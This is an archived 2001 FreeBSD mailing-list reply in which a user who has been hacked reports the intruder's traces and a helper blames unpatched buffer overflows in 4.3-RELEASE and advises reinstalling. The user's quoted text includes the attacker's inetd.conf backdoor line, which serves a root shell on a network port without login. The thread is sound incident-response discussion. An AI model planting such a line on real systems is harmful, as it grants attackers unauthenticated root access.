Skip site navigation (1)Skip section navigation (2) 
Date:      Thu, 18 Oct 2001 13:38:22 -0700
From:      Kent Stewart <kstewart@owt.com>
To:        Tomek <tomek@mpionline.com>
Cc:        freebsd-questions@FreeBSD.ORG
Subject:   Re: I got hacked, I think
Message-ID:  <3BCF3DBE.C705892A@owt.com>
References:  <20011018131823.Y621-100000@jodie.ncptiddische.net> <011e01c157cf$9b401700$f6f073d1@mpionline.com> <20011018165057.V3734@ns2.wananchi.com> <01e701c157e4$f012abc0$f6f073d1@mpionline.com> <20011018180513.C3734@ns2.wananchi.com> <20011018114805.E70327@acadia.ne.mediaone.net> <018801c157ef$37ec0720$f6f073d1@mpionline.com> <03db01c15812$c4575d40$f6f073d1@mpionline.com>
next in thread | previous in thread | raw e-mail | index | archive | help 


Tomek wrote:
> 
> I found out more info.
> 
> -rw-r--r--   1 Broot  wheel       54 Sep 26 10:24 /inetd.conf
> -rw-r--r--   1 Broot  wheel    85857 Sep 26 21:38 /sudo-1.6.3.7_1.tgz
> -rw-------  1 Broot  wheel      4869 Sep 26 10:25 /etc/inetd.conf
> 
> Checking the bizarre /inetd.conf is shocking:
> eklogin stream  tcp     nowait  root    /bin/sh sh -i
> 
> I take it that "sh" would not even request a login or anything if called
> directly from inetd.conf, would it? I am sitting here, he is STILL
> pinging me and watching the system (even tried to ftp again a few
> minutes ago), and for the life of me I can't figure out where it all
> began... who did he even login in the first time, maybe it was some
> buffer overflow or something.... yuck.

It began because you were using 4.3-release and you probably didn't fix
the security problems. There were several buffer overflow problems for
daemons that have been published for 4.3-r. The only solution in case of
a hacked has been to do a wipe and reinstall.

Kent

> 
> TY for all your help guys, you are all wonderful! I will leave you in
> peace now (I hope). I still dont know about Broot though...
> 
> To Unsubscribe: send mail to majordomo@FreeBSD.org
> with "unsubscribe freebsd-questions" in the body of the message

-- 
Kent Stewart
Richland, WA
http://users.owt.com/kstewart

Carl Sagan quote on Seti@home
http://setiathome.ssl.berkeley.edu/pale_blue_dot.html

To Unsubscribe: send mail to majordomo@FreeBSD.org
with "unsubscribe freebsd-questions" in the body of the message

Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?3BCF3DBE.C705892A>